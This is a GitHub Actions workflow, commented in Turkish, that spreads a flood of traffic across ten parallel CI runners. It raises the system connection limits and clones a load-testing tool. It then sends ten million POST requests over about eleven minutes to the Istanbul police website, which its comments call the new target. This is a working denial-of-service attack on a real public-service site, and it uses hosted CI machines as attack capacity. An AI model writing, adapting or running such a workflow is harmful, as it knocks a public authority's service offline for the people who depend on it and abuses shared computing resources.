name: Istanbul Pol Force
on: workflow_dispatch

jobs:
  police-site-test:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        # GitHub'ın izin verdiği max paralel makine (6-20 arası)
        machine: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    
    steps:
      - name: System Limits Update
        run: |
          sudo sysctl -w net.ipv4.ip_local_port_range="1024 65535"
          sudo prlimit --pid $$ --nofile=1000000:1000000 || true

      - name: Ddosify Kurulum
        run: |
          git clone https://github.com/gtsh77/ddosify-cli.git
          cd ddosify-cli
          chmod +x ./bin/ddosify-cli_linux_amd64

      - name: Ateşle (POST Method)
        run: |
          cd ddosify-cli
          ulimit -n 1000000 || true
          
          # Yeni Hedef: istanbul.pol.tr
          # -n 10000000: 10 Milyon istek
          # -d 650: 650 Saniye süre
          # -m POST: Veri gönderme metodu
          
          ./bin/ddosify-cli_linux_amd64 -n 10000000 -d 650 -t https://www.istanbul.pol.tr/ -m POST
